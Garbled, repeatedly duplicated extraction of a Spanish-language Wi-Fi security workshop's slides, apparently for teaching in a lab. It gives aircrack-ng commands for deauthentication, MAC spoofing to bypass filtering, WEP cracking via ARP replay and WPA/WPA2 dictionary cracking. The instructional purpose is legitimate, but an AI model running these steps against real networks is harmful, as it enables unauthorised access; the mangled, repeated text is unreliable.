bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
